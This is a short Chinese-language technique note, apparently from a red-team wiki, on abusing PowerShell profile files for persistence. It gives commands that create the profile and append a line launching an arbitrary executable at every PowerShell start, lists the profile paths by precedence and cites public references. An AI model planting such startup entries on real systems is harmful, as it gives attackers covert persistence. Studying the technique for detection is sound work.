滥用POWERSHELL配置文件

PowerShell启动时会执行配置文件的内容。
Powershell：
echo $profile
Test-Path $profile
New-Item -Path $profile -Type File –Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
注：Powershell默认配置文件有多个，按照从上到下的顺序优先级从高到低
Description
Path
All Users, All Hosts
$PSHOME\Profile.ps1
All Users, Current Host
$PSHOME\Microsoft.PowerShell_profile.ps1
Current User, All Hosts
$Home[My ]Documents\PowerShell\Profile.ps1
Current user, Current Host
$Home[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1
参考文章：
GitHub - enigma0x3/PowershellProfile: Abuses Powershell Profiles
GitHub
Abusing Powershell Profiles
enigma0x3
about Profiles - PowerShell
docsmsft
​

最近更新 2yr ago

Description	Path
All Users, All Hosts	$PSHOME\Profile.ps1
All Users, Current Host	$PSHOME\Microsoft.PowerShell_profile.ps1
Current User, All Hosts	$Home[My ]Documents\PowerShell\Profile.ps1
Current user, Current Host	$Home[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1